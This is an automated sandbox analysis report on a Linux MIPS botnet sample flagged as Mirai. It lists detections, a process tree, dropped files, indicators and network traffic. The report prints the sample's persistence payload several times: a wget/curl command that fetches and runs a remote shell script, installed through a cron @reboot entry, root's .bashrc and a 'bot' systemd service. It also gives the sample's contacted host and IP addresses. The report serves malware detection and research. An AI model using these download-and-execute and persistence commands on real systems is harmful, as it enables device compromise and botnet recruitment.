Edit tour

Linux Analysis Report
mipsel.elf

Overview

General Information

Sample name:	mipsel.elf
Analysis ID:	1558939
MD5:	bdf20281cdc4d40edabf85e3edc4e6d8
SHA1:	3305c71c940aab3a0e255cf3a09e3e481a0bf865
SHA256:	164676646c90c920424563898710ffffd50cedac7b1b4d588b52527112e7c2c8
Tags:	elfuser-abuse_ch
Infos:

Detection

Score:	68
Range:	0 - 100
Whitelisted:	false

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Executes the "crontab" command typically for achieving persistence

Modifies the '.bashrc' or '.bash_profile' file typically for persisting actions

Sample tries to persist itself using cron

Creates hidden files and/or directories

Detected non-DNS traffic on DNS port

Executes commands using a shell command-line interpreter

Executes the "chmod" command used to modify permissions

Executes the "systemctl" command used for controlling the systemd system and service manager

Found strings indicative of a multi-platform dropper

Reads the 'hosts' file potentially containing internal network hosts

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Sample has stripped symbol table

Sample listens on a socket

Uses the "uname" system call to query kernel version information (possible evasion)

Classification

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1558939
Start date and time:	2024-11-20 00:56:15 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 38s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Sample name:	mipsel.elf
Detection:	MAL
Classification:	mal68.troj.linELF@0/4@31/0

Warnings

Excluded domains from analysis (whitelisted): 15.2.168.192.in-addr.arpa

Runtime Messages

Command:	/tmp/mipsel.elf
PID:	5528
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:	we kinda rocking ngl
Standard Error:

Process Tree

system is lnxubuntu20

mipsel.elf (PID: 5528, Parent: 5447, MD5: 0d6f61f82cf2f781c6eb0661071d42d9) Arguments: /tmp/mipsel.elf

mipsel.elf New Fork (PID: 5530, Parent: 5528)

mipsel.elf New Fork (PID: 5532, Parent: 5530)

mipsel.elf New Fork (PID: 5534, Parent: 5530)

mipsel.elf New Fork (PID: 5537, Parent: 5530)

mipsel.elf New Fork (PID: 5540, Parent: 5530)

sh (PID: 5540, Parent: 5530, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "(crontab -l ; echo \"@reboot /bin/bash -c \"/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh\"\") | crontab -"

sh New Fork (PID: 5542, Parent: 5540)

sh New Fork (PID: 5544, Parent: 5542)

crontab (PID: 5544, Parent: 5542, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l

sh New Fork (PID: 5545, Parent: 5542)

chmod (PID: 5545, Parent: 5542, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x bins.sh

sh New Fork (PID: 5546, Parent: 5542)

sh (PID: 5546, Parent: 5542, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh bins.sh

sh New Fork (PID: 5547, Parent: 5542)

curl (PID: 5547, Parent: 5542, MD5: add6bc2195e82c55985ccf49fd4048e6) Arguments: /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh

sh New Fork (PID: 5550, Parent: 5542)

chmod (PID: 5550, Parent: 5542, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x bins.sh

sh (PID: 5542, Parent: 5540, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh bins.sh

sh New Fork (PID: 5543, Parent: 5540)

crontab (PID: 5543, Parent: 5540, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -

mipsel.elf New Fork (PID: 5551, Parent: 5530)

sh (PID: 5551, Parent: 5530, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "/bin/systemctl enable bot"

sh New Fork (PID: 5557, Parent: 5551)

systemctl (PID: 5557, Parent: 5551, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: /bin/systemctl enable bot

systemd New Fork (PID: 5559, Parent: 5558)

snapd-env-generator (PID: 5559, Parent: 5558, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator

cleanup

Yara Signatures

⊘No yara matches

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: mipsel.elf

Avira: detected

Multi AV Scanner detection for submitted file

Source: mipsel.elf

ReversingLabs: Detection: 34%

Source: mipsel.elf	String: /proc//exe/proc/%d/cwd/var/tmp/proc/%d/fd.../proc/%d/fd/%s/proc/proc/%d/statr /root/mnt/dev/cmdline/wget/tftp/curl/reboot/libbin//dev/watchdog/dev/misc/watchdogmipsel->unknown%d/bin/busybox/bin/sh/var/Sofiatelnetd@
Source: mipsel.elf	String: /bin/bash -c "/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh"
Source: mipsel.elf	String: j2go/proc/net/tcp5.188.230.23137.18.73.94167.235.128.15168.191.23.13445.195.74.233141.94.21.7118.220.154.2118.210.151.8537.187.153.12745.195.74.1970123456789ABCDEF(crontab -l ; echo "@reboot %s") \| crontab -/bin/bash -c "/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh"%s/.bashrca
Source: .bashrc.13.dr	String: /bin/bash -c "/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh"
Source: bot.service.13.dr	String: ExecStart=/bin/bash -c "/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh"

Source: global traffic	TCP traffic: 192.168.2.15:55762 -> 8.8.8.8:53
Source: global traffic	TCP traffic: 192.168.2.15:55760 -> 8.8.8.8:53
Source: global traffic	TCP traffic: 192.168.2.15:55752 -> 8.8.8.8:53
Source: global traffic	TCP traffic: 192.168.2.15:55758 -> 8.8.8.8:53
Source: global traffic	TCP traffic: 192.168.2.15:55756 -> 8.8.8.8:53

Source: /bin/curl (PID: 5547)

Reads hosts file: /etc/hosts

Jump to behavior

Source: /tmp/mipsel.elf (PID: 5528)

Socket: 127.0.0.1:4161

Jump to behavior

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: host.zopz-api.com
Source: global traffic	DNS traffic detected: DNS query: motd.ubuntu.com
Source: global traffic	DNS traffic detected: DNS query: daisy.ubuntu.com

Source: tmp.kyAZ7l.23.dr	String found in binary or memory: http://serverip/bins/bins.sh
Source: bot.service.13.dr	String found in binary or memory: http://serverip/bins/bins.sh;

Source: Initial sample	String containing 'busybox' found: /bin/busybox
Source: Initial sample	String containing 'busybox' found: /proc//exe/proc/%d/cwd/var/tmp/proc/%d/fd.../proc/%d/fd/%s/proc/proc/%d/statr /root/mnt/dev/cmdline/wget/tftp/curl/reboot/libbin//dev/watchdog/dev/misc/watchdogmipsel->unknown%d/bin/busybox/bin/sh/var/Sofiatelnetd@

Source: ELF static info symbol of initial sample

.symtab present: no

Source: classification engine

Classification label: mal68.troj.linELF@0/4@31/0

Persistence and Installation Behavior

Executes the "crontab" command typically for achieving persistence

Source: /bin/sh (PID: 5544)	Crontab executable: /usr/bin/crontab -> crontab -l			Jump to behavior
Source: /bin/sh (PID: 5543)	Crontab executable: /usr/bin/crontab -> crontab -			Jump to behavior

Modifies the '.bashrc' or '.bash_profile' file typically for persisting actions

Source: /tmp/mipsel.elf (PID: 5530)

File written: /root/.bashrc

Jump to behavior

Sample tries to persist itself using cron

Source: /usr/bin/crontab (PID: 5543)	File: /var/spool/cron/crontabs/tmp.kyAZ7l			Jump to behavior
Source: /usr/bin/crontab (PID: 5543)	File: /var/spool/cron/crontabs/root			Jump to behavior

Source: /tmp/mipsel.elf (PID: 5530)	File: /root/.bashrc			Jump to behavior
Source: /bin/curl (PID: 5547)	Directory: /root/.curlrc			Jump to behavior

Source: /tmp/mipsel.elf (PID: 5540)	Shell command executed: sh -c "(crontab -l ; echo \"@reboot /bin/bash -c \"/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh\"\") \| crontab -"			Jump to behavior
Source: /tmp/mipsel.elf (PID: 5551)	Shell command executed: sh -c "/bin/systemctl enable bot"			Jump to behavior

Source: /bin/sh (PID: 5545)	Chmod executable: /usr/bin/chmod -> chmod +x bins.sh			Jump to behavior
Source: /bin/sh (PID: 5550)	Chmod executable: /usr/bin/chmod -> chmod +x bins.sh			Jump to behavior

Source: /bin/sh (PID: 5557)

Systemctl executable: /bin/systemctl -> /bin/systemctl enable bot

Jump to behavior

Source: /tmp/mipsel.elf (PID: 5528)	Queries kernel information via 'uname':			Jump to behavior
Source: /bin/curl (PID: 5547)	Queries kernel information via 'uname':			Jump to behavior

Source: mipsel.elf, 5528.1.0000558fa359e000.0000558fa3646000.rw-.sdmp, mipsel.elf, 5530.1.0000558fa359e000.0000558fa3646000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/mipsel
Source: mipsel.elf, 5528.1.00007ffcda39d000.00007ffcda3be000.rw-.sdmp, mipsel.elf, 5530.1.00007ffcda39d000.00007ffcda3be000.rw-.sdmp	Binary or memory string: Yx86_64/usr/bin/qemu-mipsel/tmp/mipsel.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/mipsel.elf
Source: mipsel.elf, 5528.1.0000558fa359e000.0000558fa3646000.rw-.sdmp, mipsel.elf, 5530.1.0000558fa359e000.0000558fa3646000.rw-.sdmp	Binary or memory string: U!/etc/qemu-binfmt/mipsel
Source: mipsel.elf, 5528.1.00007ffcda39d000.00007ffcda3be000.rw-.sdmp, mipsel.elf, 5530.1.00007ffcda39d000.00007ffcda3be000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-mipsel
Source: mipsel.elf, 5530.1.00007ffcda39d000.00007ffcda3be000.rw-.sdmp	Binary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	2 Scripting	Valid Accounts	1 Scheduled Task/Job	1 Unix Shell Configuration Modification	1 Unix Shell Configuration Modification	1 File and Directory Permissions Modification	OS Credential Dumping	11 Security Software Discovery	Remote Services	Data from Local System	1 Non-Application Layer Protocol	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Systemd Service	1 Systemd Service	1 Hidden Files and Directories	LSASS Memory	1 File and Directory Discovery	Remote Desktop Protocol	Data from Removable Media	1 Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 Scheduled Task/Job	1 Scheduled Task/Job	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	Steganography	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	2 Scripting	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
mipsel.elf	34%	ReversingLabs	Linux.Backdoor.Mirai
mipsel.elf	100%	Avira	EXP/ELF.Mirai.W

Dropped Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
host.zopz-api.com	172.111.38.48	true	false	unknown
daisy.ubuntu.com	unknown	unknown	false	high
motd.ubuntu.com	unknown	unknown	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://serverip/bins/bins.sh	tmp.kyAZ7l.23.dr	false		high
http://serverip/bins/bins.sh;	bot.service.13.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.111.38.48	host.zopz-api.com	Reserved		54540	INCERO-HVVCUS	false

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
INCERO-HVVCUS	cIhVfU4Bus.elf	Get hash	malicious	Mirai	Browse	172.110.25.149
	b2bXo6vmDm.exe	Get hash	malicious	SystemBC	Browse	23.29.124.10
	https://auth-start-treizor.github.io/	Get hash	malicious	Unknown	Browse	23.227.176.186
	https://ambassadorlimo.com	Get hash	malicious	Unknown	Browse	198.99.138.98
	https://ambassadorlimo.com/	Get hash	malicious	Unknown	Browse	198.99.138.98
	https://link.edgepilot.com/s/58d339fb/mi_L0_elk0K48SZfFk6Q5A?u=http://www.ambassadorlimo.com/	Get hash	malicious	Unknown	Browse	198.99.138.98
	http://www.philmauer.com/	Get hash	malicious	Unknown	Browse	172.111.52.90
	http://loveevamk.life	Get hash	malicious	Unknown	Browse	172.111.38.73
	ychqRZFkZi.exe	Get hash	malicious	Quasar	Browse	209.182.234.69
	ychqRZFkZi.exe	Get hash	malicious	Quasar	Browse	209.182.234.69

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

/memfd:snapd-env-generator (deleted)

Download File

Process:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File Type:	ASCII text
Category:	dropped
Size (bytes):	76
Entropy (8bit):	3.7627880354948586
Encrypted:	false
SSDEEP:	3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
MD5:	D86A1F5765F37989EB0EC3837AD13ECC
SHA1:	D749672A734D9DEAFD61DCA501C6929EC431B83E
SHA-256:	85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
SHA-512:	338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.

/root/.bashrc

Download File

Process:	/tmp/mipsel.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	178
Entropy (8bit):	4.358630015292201
Encrypted:	false
SSDEEP:	3:C7exTAXWTHYMOduLWiHSH7zFUbKEVQRFQ4AXWTHYMOduLWiHc:yeGsHPirvFNBjwsHPiL
MD5:	C3685F292213652676F734AB36C060EE
SHA1:	1D05F7F6302EC60E7990DE4BBE9180C149EFC731
SHA-256:	D070C429D850B4BAAED03330B6F96C7473ED86D0D33A2FACCD11FB3325767C4C
SHA-512:	7AC7D9594C8A4F0160FF9AAE92F7A1EFDFDB933EE3006DCCAC910C79F6FC529AF07B8DF9DAD16E8C21EC3DEF5C5AB9168E4994AE87EDE23E7D4A20F2E7178295
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	./bin/bash -c "/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh".

/usr/lib/systemd/system/bot.service

Download File

Process:	/tmp/mipsel.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	356
Entropy (8bit):	4.9110117370593995
Encrypted:	false
SSDEEP:	6:z872KstRZAMg8uko4dj2+feGsHPirvFNBjwsHPiFLnLQmWA4Rv:zE2ltRZAXsQ+GGmPirvFNBjwmPipLHW7
MD5:	F03C70CD4C61A1852F9E19B8FB0D639C
SHA1:	A6C078FFFFDF05C4C47B273B24E6B3FF4EF7E008
SHA-256:	AE50A3052A395987A2779DEB9253D4AA8638F2F8B1CDA7DF9039388F21BE7A90
SHA-512:	6277FBBFFCDD72FC3712721525538AC07FC46D290EBB02BE34CEF52B3E62BFA8A66F4E834D364D220108C815192E391AD986F05662FCBFAE674417507F4BCC20
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	[Unit].Description=My Miscellaneous Service.After=network.target..[Service].Type=simple.User=root.WorkingDirectory=/tmp.ExecStart=/bin/bash -c "/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh".Restart=no..[Install].WantedBy=multi-user.target.

/var/spool/cron/crontabs/tmp.kyAZ7l

Download File

Process:	/usr/bin/crontab
File Type:	ASCII text
Category:	dropped
Size (bytes):	235
Entropy (8bit):	5.104158129595515
Encrypted:	false
SSDEEP:	6:SUrpqoqQjEOP1KmREJOBFQLvamuZHGMQ5UYLtCFt3HY8jsHB:8QjHig8mmqeHLUHY8mB
MD5:	D44BADE6FD643ECE44BA05AA097B89D6
SHA1:	A431A237D6C77798FE8E433FA691E6B4DFAE5020
SHA-256:	34DF6E7AD21D72F9F78A822D3A8F1AC2027A873CFEE6B94588FE246EA0C5E6CD
SHA-512:	8C6940C8EC55B4D7E9B2A5C3FAD2D26D712EE8D712DF00D18E674FCB3B819B599BF1101D36A66FEFAB98E9C88B4F8C7FDC1267E92306980A12859E00D217C5E1
Malicious:	true
Reputation:	low
Preview:	# DO NOT EDIT THIS FILE - edit the master and reinstall..# (- installed on Tue Nov 19 17:57:09 2024).# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $).@reboot /bin/bash -c /bin/wget http://serverip/bins/bins.sh.

Static File Info

General

File type:	ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
Entropy (8bit):	5.512251414843498
TrID:	ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name:	mipsel.elf
File size:	101'064 bytes
MD5:	bdf20281cdc4d40edabf85e3edc4e6d8
SHA1:	3305c71c940aab3a0e255cf3a09e3e481a0bf865
SHA256:	164676646c90c920424563898710ffffd50cedac7b1b4d588b52527112e7c2c8
SHA512:	e99905249aa98a888c786b627c9059c2499cf925d2b45af3754ff25964bd5a3ee9d3bc97bb90713fa1c26587d679d570a9e1638ad1e2d03782eb23ec25c39470
SSDEEP:	1536:sMDfnxMfcvWHeGX6y5IFF8kA9zLtU5NlZe/NhySRCFvGVy:sM7xMfcvWX5ntINlKCvGVy
TLSH:	10A3E706BF514FB7D86BDC7706F90B1128CCA81B26A92B75B434EC58B60B28B16D3974
File Content Preview:	.ELF....................`.@.4... .......4. ...(...............@...@..f...f...............p...pE..pE.X....l..........Q.td...............................<\|..'!......'.......................<X..'!... .........9'.. ........................<(..'!............M9

Static ELF Info

ELF header
Class:	ELF32
Data:	2's complement, little endian
Version:	1 (current)
Machine:	MIPS R3000
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x400260
Flags:	0x1007
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	3
Section Header Offset:	100384
Section Header Size:	40
Number of Section Headers:	17
Header String Table Index:	16

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0
.init	PROGBITS	0x400094	0x94	0x8c	0x0	0x6	AX	4
.text	PROGBITS	0x400120	0x120	0x14d10	0x0	0x6	AX	16
.fini	PROGBITS	0x414e30	0x14e30	0x5c	0x0	0x6	AX	4
.rodata	PROGBITS	0x414e90	0x14e90	0x1840	0x0	0x2	A	16
.eh_frame	PROGBITS	0x4166d0	0x166d0	0x4	0x0	0x2	A	4
.ctors	PROGBITS	0x457000	0x17000	0x8	0x0	0x3	WA	4
.dtors	PROGBITS	0x457008	0x17008	0x8	0x0	0x3	WA	4
.jcr	PROGBITS	0x457010	0x17010	0x4	0x0	0x3	WA	4
.data.rel.ro	PROGBITS	0x457014	0x17014	0x24	0x0	0x3	WA	4
.data	PROGBITS	0x457040	0x17040	0x3e0	0x0	0x3	WA	16
.got	PROGBITS	0x457420	0x17420	0x638	0x4	0x10000003	WAp	16
.sbss	NOBITS	0x457a58	0x17a58	0x14	0x0	0x10000003	WAp	4
.bss	NOBITS	0x457a70	0x17a58	0x6240	0x0	0x3	WA	16
.comment	PROGBITS	0x0	0x17a58	0xd4a	0x0	0x0		1
.mdebug.abi32	PROGBITS	0xd4a	0x187a2	0x0	0x0	0x0		1
.shstrtab	STRTAB	0x0	0x187a2	0x7c	0x0	0x0		1

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
LOAD	0x0	0x400000	0x400000	0x166d4	0x166d4	5.5626	0x5	R E	0x10000	.init .text .fini .rodata .eh_frame
LOAD	0x17000	0x457000	0x457000	0xa58	0x6cb0	3.8834	0x6	RW	0x10000	.ctors .dtors .jcr .data.rel.ro .data .got .sbss .bss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x7	RWE	0x4

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 20, 2024 00:57:05.894556046 CET	55752	53	192.168.2.15	8.8.8.8
Nov 20, 2024 00:57:10.118293047 CET	55752	53	192.168.2.15	8.8.8.8
Nov 20, 2024 00:57:18.353688955 CET	55756	53	192.168.2.15	8.8.8.8
Nov 20, 2024 00:57:19.366024971 CET	55756	53	192.168.2.15	8.8.8.8
Nov 20, 2024 00:57:21.381982088 CET	55756	53	192.168.2.15	8.8.8.8
Nov 20, 2024 00:57:25.477853060 CET	55756	53	192.168.2.15	8.8.8.8
Nov 20, 2024 00:57:44.353009939 CET	55758	53	192.168.2.15	8.8.8.8
Nov 20, 2024 00:57:45.381325006 CET	55758	53	192.168.2.15	8.8.8.8
Nov 20, 2024 00:57:47.397267103 CET	55758	53	192.168.2.15	8.8.8.8
Nov 20, 2024 00:57:51.589163065 CET	55758	53	192.168.2.15	8.8.8.8
Nov 20, 2024 00:57:59.852740049 CET	55760	53	192.168.2.15	8.8.8.8
Nov 20, 2024 00:58:00.868880033 CET	55760	53	192.168.2.15	8.8.8.8
Nov 20, 2024 00:58:02.884965897 CET	55760	53	192.168.2.15	8.8.8.8
Nov 20, 2024 00:58:06.948771000 CET	55760	53	192.168.2.15	8.8.8.8
Nov 20, 2024 00:58:15.352231026 CET	55762	53	192.168.2.15	8.8.8.8
Nov 20, 2024 00:58:16.356590033 CET	55762	53	192.168.2.15	8.8.8.8
Nov 20, 2024 00:58:18.372456074 CET	55762	53	192.168.2.15	8.8.8.8
Nov 20, 2024 00:58:22.564570904 CET	55762	53	192.168.2.15	8.8.8.8
Nov 20, 2024 00:59:00.490073919 CET	51012	1290	192.168.2.15	172.111.38.48
Nov 20, 2024 00:59:00.495740891 CET	1290	51012	172.111.38.48	192.168.2.15
Nov 20, 2024 00:59:00.496016026 CET	51012	1290	192.168.2.15	172.111.38.48
Nov 20, 2024 00:59:00.497795105 CET	51012	1290	192.168.2.15	172.111.38.48
Nov 20, 2024 00:59:00.502938032 CET	1290	51012	172.111.38.48	192.168.2.15
Nov 20, 2024 00:59:00.953301907 CET	1290	51012	172.111.38.48	192.168.2.15
Nov 20, 2024 00:59:00.953823090 CET	51012	1290	192.168.2.15	172.111.38.48
Nov 20, 2024 00:59:01.087191105 CET	1290	51012	172.111.38.48	192.168.2.15
Nov 20, 2024 00:59:01.087707043 CET	51012	1290	192.168.2.15	172.111.38.48
Nov 20, 2024 00:59:01.087953091 CET	51012	1290	192.168.2.15	172.111.38.48
Nov 20, 2024 00:59:01.093518019 CET	1290	51012	172.111.38.48	192.168.2.15
Nov 20, 2024 00:59:05.953819990 CET	1290	51012	172.111.38.48	192.168.2.15
Nov 20, 2024 00:59:05.954281092 CET	51012	1290	192.168.2.15	172.111.38.48
Nov 20, 2024 00:59:05.954355955 CET	51012	1290	192.168.2.15	172.111.38.48
Nov 20, 2024 00:59:05.959551096 CET	1290	51012	172.111.38.48	192.168.2.15
Nov 20, 2024 00:59:05.959803104 CET	51012	1290	192.168.2.15	172.111.38.48
Nov 20, 2024 00:59:05.965153933 CET	1290	51012	172.111.38.48	192.168.2.15
Nov 20, 2024 00:59:10.954204082 CET	1290	51012	172.111.38.48	192.168.2.15
Nov 20, 2024 00:59:10.954396009 CET	51012	1290	192.168.2.15	172.111.38.48
Nov 20, 2024 00:59:10.954488039 CET	51012	1290	192.168.2.15	172.111.38.48
Nov 20, 2024 00:59:10.959924936 CET	1290	51012	172.111.38.48	192.168.2.15
Nov 20, 2024 00:59:10.960030079 CET	51012	1290	192.168.2.15	172.111.38.48
Nov 20, 2024 00:59:10.965389013 CET	1290	51012	172.111.38.48	192.168.2.15

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 20, 2024 00:57:10.281671047 CET	58302	53	192.168.2.15	1.1.1.1
Nov 20, 2024 00:57:13.105171919 CET	37282	53	192.168.2.15	1.1.1.1
Nov 20, 2024 00:57:14.814310074 CET	37097	53	192.168.2.15	1.1.1.1
Nov 20, 2024 00:57:14.814310074 CET	57570	53	192.168.2.15	1.1.1.1
Nov 20, 2024 00:57:15.291449070 CET	42527	53	192.168.2.15	1.1.1.1
Nov 20, 2024 00:57:19.818146944 CET	37097	53	192.168.2.15	1.1.1.1
Nov 20, 2024 00:57:20.294725895 CET	37880	53	192.168.2.15	1.1.1.1
Nov 20, 2024 00:57:24.853466034 CET	37097	53	192.168.2.15	1.1.1.1
Nov 20, 2024 00:57:25.318486929 CET	57094	53	192.168.2.15	1.1.1.1
Nov 20, 2024 00:57:28.603434086 CET	39485	53	192.168.2.15	8.8.8.8
Nov 20, 2024 00:57:30.103337049 CET	37097	53	192.168.2.15	1.1.1.1
Nov 20, 2024 00:57:30.322328091 CET	37593	53	192.168.2.15	1.1.1.1
Nov 20, 2024 00:57:33.853220940 CET	39485	53	192.168.2.15	8.8.8.8
Nov 20, 2024 00:57:35.353162050 CET	37097	53	192.168.2.15	1.1.1.1
Nov 20, 2024 00:57:39.103084087 CET	39485	53	192.168.2.15	8.8.8.8
Nov 20, 2024 00:57:40.603032112 CET	37097	53	192.168.2.15	1.1.1.1
Nov 20, 2024 00:57:45.852890968 CET	37097	53	192.168.2.15	1.1.1.1
Nov 20, 2024 00:57:54.602704048 CET	51135	53	192.168.2.15	1.1.1.1
Nov 20, 2024 00:57:55.329466105 CET	36504	53	192.168.2.15	1.1.1.1
Nov 20, 2024 00:58:00.333939075 CET	52768	53	192.168.2.15	1.1.1.1
